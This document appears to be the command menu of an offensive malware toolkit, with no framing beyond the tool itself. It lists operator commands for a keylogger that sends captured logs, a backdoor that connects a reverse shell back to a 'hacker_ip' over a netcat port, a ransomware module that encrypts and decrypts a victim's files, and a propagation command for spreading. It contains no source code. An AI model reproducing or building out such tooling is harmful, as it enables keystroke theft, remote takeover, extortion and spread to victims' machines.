###########################################################################################################################
####################################################     KEYLOGGER     ####################################################
###########################################################################################################################

[+] keylogger send_log: Sends the log and resets it
[+] keylogger reset_log: Erases all the content of the log file

###########################################################################################################################
####################################################     BACKDOOR     #####################################################
###########################################################################################################################

[+] backdoor <hacker_ip> <netcat port>: Tell the victim where to connect the reverse shell

###########################################################################################################################
###################################################     RANSOMWARE     ####################################################
###########################################################################################################################

[+] ransomware encrypt: Let the ransomware encrypt everything
[+] ransomware decrypt: Let the ransomware decrypt everything

###########################################################################################################################
###################################################     PROPAGATION     ###################################################
###########################################################################################################################

[+] propagation start